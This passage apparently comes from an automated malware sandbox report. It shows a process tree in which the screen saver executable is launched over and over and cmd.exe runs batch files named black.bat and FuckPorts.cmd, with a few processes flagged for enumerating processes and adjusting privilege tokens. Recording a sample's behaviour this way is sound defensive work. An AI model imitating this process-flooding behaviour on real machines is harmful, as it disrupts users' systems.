    3⤵
    PID:2088
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2512
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:896
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2388
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1488
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2652
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2568
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:784
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2868
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1840
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2452
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3028
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2900
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1308
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2092
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1952
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2172
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2080
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2712
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2968
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2280
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2464
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2076
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3020
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2224
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2472
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1620
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2844
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2676
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2616
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2916
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2620
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2900
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1648
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2828
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2948
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2172
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2796
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1168
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2888
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2324
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2964
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:684
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2416
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2472
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:784
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2568
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2316
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2620
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2656
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2880
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2484
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2052
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2236
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2968
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2756
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2992
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2560
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2712
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1240
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3040
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2284
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2576
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2740
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1108
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2328
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1596
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2608
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2488
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1740
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2996
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1216
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2980
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2948
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:800
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1924
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2532
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3056
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2892
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2172
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2284
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:896
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2740
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2600
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:108
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2164
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2132
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2096
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2860
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2996
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1772
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2552
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2580
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:868
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1060
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2456
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2104
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2956
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2560
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:836
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2872
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2504
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2392
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2676
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:888
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2316
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1772
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2640
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2980
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1280
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2968
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2332
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2904
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2104
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2712
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2416
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2236
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:588
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2868
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3056
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2620
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2200
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:888
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2624
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2440
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1740
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1116
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2452
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2684
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2936
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2888
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2964
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3040
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1756
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3004
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:588
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3056
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2180
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:108
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1732
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3016
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2552
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2524
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2984
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1820
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2144
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2108
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2116
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1368
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2880
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2084
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K black.bat
  2⤵
  PID:1744
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1200
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1732
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1600
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1244
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1104
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1984
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2080
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2176
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2320
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2528
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2272
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2536
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2816
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2412
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2544
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2524
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2704
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2552
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2640
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1308
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2912
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2344
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2480
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3060
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:564
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2464
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2176
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2668
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:828
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2396
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2604
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3060
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2924
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2416
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2668
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1732
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1716
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2516
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:888
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2276
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2336
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1740
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2252
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2828
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2420
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2616
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2920
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1308
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2800
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2396
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:700
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2876
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1560
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2460
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:300
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2180
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2528
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2832
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2060
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1988
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3024
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3016
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2828
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2476
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2624
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1572
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2680
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2720
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1600
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2088
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2840
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2068
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2560
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1240
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2892
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2872
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2604
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1488
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2848
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2356
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2844
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3016
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2828
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2580
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2096
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2332
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2596
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3068
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2920
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2256
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2120
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2172
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2468
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1592
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2540
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2820
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2620
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1932
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2444
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2420
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2200
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1244
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2980
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2564
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2092
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2352
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2332
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2932
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2184
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2292
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3044
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2156
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K FuckPorts.cmd
  2⤵
  PID:952
